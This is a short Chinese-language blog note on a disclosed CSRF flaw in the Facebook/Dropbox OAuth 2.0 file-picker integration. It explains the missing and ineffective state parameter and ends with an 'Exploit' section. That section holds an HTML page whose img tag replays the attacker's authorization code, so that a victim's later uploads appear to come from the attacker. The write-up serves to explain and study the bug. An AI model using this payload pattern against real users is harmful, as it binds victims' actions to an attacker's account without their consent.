CSRF in Facebook/Dropbox - "Mallory added a file using Dropbox"


fb 允许在小组页内,授权dropbox(oAuth 2.0), 直接上传dropbox中的文件.

这案例中, dropbox是client, fb是authorizaiton server & protected resources.

当点击upload button时, browser会发送以下请求:

https://www.facebook.com/dialog/oauth?display=popup&client_id=210019893730&redirect_uri=https://www.dropbox.com/fb/filepicker?restrict=100000740415566&group_id=840143532794003&scope=publish_actions,user_groups,email&response_type=code  

这个链接是经典的oAuth 2.0的一种实现, 但是它并没有使用state参数, 因此它是会受到CSRF攻击的.


credit: From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017

An opaque value used by the client to maintain state between the request and callback. The authorization server includes this value when redirecting the user-agent back to the client. The parameter SHOULD be used for preventing cross-site request forgery (CSRF).

然而,就算加了state参数, 它依然会受到CSRF攻击.

因为在开篇时说, dropbox才是client, authorization server将redirect 用户会dropbox.com. 不过该请求却是fb发起, 于是即使redirect回dropbox, dropbox并不能对比state是否属于用户.

Exploit

诱导用户访问以下page

<html>
<img src="https://www.dropbox.com/fb/filepicker?restrict=100000740415566 
&group_id=236635446746130 
&code=AQAJspmJvIyCiTicc4QNr7qVU4EF05AYqBE_K9pl-fbhSuKyxtjHS_UyYU8K0S
czXZCTa9WxtG7I8EoxAIcyqhyO0tagiVSa1m2H3Umg8uZR6gixrlmUXKuyoXmYsb14yxPbwonY
xvepwP2N93gWxhVwl1me-qeenZIX2oKgqBuFMRHAW5SCaYCvYSYtaMlrDyYGoftTCAYM0QfU_
bX94LfkHUl81O1tmrLU2NtnU5Eh_XKvxjiD5j2ftSWfpCoxeb7ccaz_9UPZjsFnKGCtTTPX_2dCqi99aT
7B3M4idq6hzY-wUuDmaOL143WolrCGkDUu-np8gyEFx4wfMMdX0a0g#_=_" />
</html> 

然后, 当victim在fb小组页中通过dropbox上传文件, 该文件就会显示上传者是attacker.

Exploit之所以成功, 还有一个条件:

  • dropbox的access token会被cached forever.
  • 一旦victim将access token绑到fb, 以后即使有新的合法的authorization code, dropbox还是会沿用第一次绑的malicious access token, 通过它发表post到fb.

Ref

Into the symmetry: CSRF in Facebook/Dropbox - "Mallory added a file using Dropbox"

Show Comments